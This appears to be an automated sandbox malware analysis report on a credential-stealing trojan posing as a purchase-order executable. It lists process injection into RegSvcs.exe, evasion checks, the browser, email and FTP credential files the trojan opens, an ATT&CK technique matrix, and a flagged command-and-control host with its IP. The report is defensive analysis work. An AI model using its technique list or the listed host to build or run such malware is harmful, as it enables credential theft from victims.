                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004123F1 SetUnhandledExceptionFilter,2_2_004123F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 70E008Jump to behavior
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\[Purchase Order] PO2411024.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
                  Source: [Purchase Order] PO2411024.exeBinary or memory string: Shell_TrayWnd
                  Source: [Purchase Order] PO2411024.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,2_2_00417A20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.5060000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.5060000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.264f73e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d5678.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d5678.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d6560.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3924698.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.2650626.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0ee8.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.264f73e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3924698.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0ee8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d6560.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.2650626.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4938434032.0000000002902000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4938434032.000000000292E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4940216324.00000000038D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4938021567.000000000260F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7000, type: MEMORYSTR
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.5060000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.5060000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.264f73e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d5678.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d5678.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d6560.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3924698.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.2650626.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0ee8.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.264f73e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3924698.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0ee8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d6560.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.2650626.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4940216324.00000000038D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4938021567.000000000260F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: [Purchase Order] PO2411024.exeBinary or memory string: WIN_XP
                  Source: [Purchase Order] PO2411024.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
                  Source: [Purchase Order] PO2411024.exeBinary or memory string: WIN_XPe
                  Source: [Purchase Order] PO2411024.exeBinary or memory string: WIN_VISTA
                  Source: [Purchase Order] PO2411024.exeBinary or memory string: WIN_7
                  Source: [Purchase Order] PO2411024.exeBinary or memory string: WIN_8
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.5060000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.5060000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.264f73e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d5678.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d5678.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d6560.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3924698.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.2650626.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0ee8.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.264f73e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3924698.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0ee8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d6560.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.2650626.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4938434032.0000000002902000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4940216324.00000000038D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4938021567.000000000260F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7000, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.5060000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.5060000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.264f73e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d5678.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d5678.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d6560.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3924698.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.2650626.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0ee8.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.264f73e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3924698.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0ee8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d6560.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.2650626.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4938434032.0000000002902000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4938434032.000000000292E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4940216324.00000000038D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4938021567.000000000260F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7000, type: MEMORYSTR
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.5060000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.5060000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.264f73e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d5678.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d5678.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d6560.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3924698.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.2650626.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0ee8.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.264f73e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3924698.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0ee8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d6560.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.2650626.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4940216324.00000000038D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4938021567.000000000260F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure2
                  Valid Accounts
                  121
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  11
                  Disable or Modify Tools
                  2
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  2
                  Ingress Tool Transfer
                  1
                  Exfiltration Over Alternative Protocol
                  1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts2
                  Native API
                  2
                  Valid Accounts
                  1
                  DLL Side-Loading
                  11
                  Deobfuscate/Decode Files or Information
                  121
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol2
                  Data from Local System
                  1
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  Command and Scripting Interpreter
                  Logon Script (Windows)2
                  Valid Accounts
                  2
                  Obfuscated Files or Information
                  1
                  Credentials in Registry
                  2
                  File and Directory Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation
                  1
                  Software Packing
                  NTDS138
                  System Information Discovery
                  Distributed Component Object Model121
                  Input Capture
                  2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection
                  1
                  DLL Side-Loading
                  LSA Secrets551
                  Security Software Discovery
                  SSH3
                  Clipboard Data
                  12
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Valid Accounts
                  Cached Domain Credentials131
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
                  Virtualization/Sandbox Evasion
                  DCSync2
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Access Token Manipulation
                  Proc Filesystem11
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                  Process Injection
                  /etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  [Purchase Order] PO2411024.exe55%ReversingLabsWin32.Trojan.AutoitInject
                  [Purchase Order] PO2411024.exe100%AviraHEUR/AGEN.1321703
                  [Purchase Order] PO2411024.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://ftp.jeepcommerce.rs100%Avira URL Cloudmalware
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ftp.jeepcommerce.rs
                  195.252.110.253
                  truefalse
                    high
                    ip-api.com
                    208.95.112.1
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://ip-api.com/line/?fields=hostingfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://ftp.jeepcommerce.rsRegSvcs.exe, 00000002.00000002.4938434032.000000000292E000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://account.dyn.com/RegSvcs.exe, 00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4940216324.00000000038D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4938021567.000000000260F000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.4938434032.00000000028D1000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://ip-api.comRegSvcs.exe, 00000002.00000002.4938434032.00000000028D1000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              208.95.112.1
                              ip-api.comUnited States
                              53334TUT-ASUSfalse
                              195.252.110.253
                              ftp.jeepcommerce.rsSerbia
                              6700BEOTEL-AShttpwwwbeotelnetRSfalse
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1557572
                              Start date and time:2024-11-18 13:04:25 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 9m 40s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:5
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
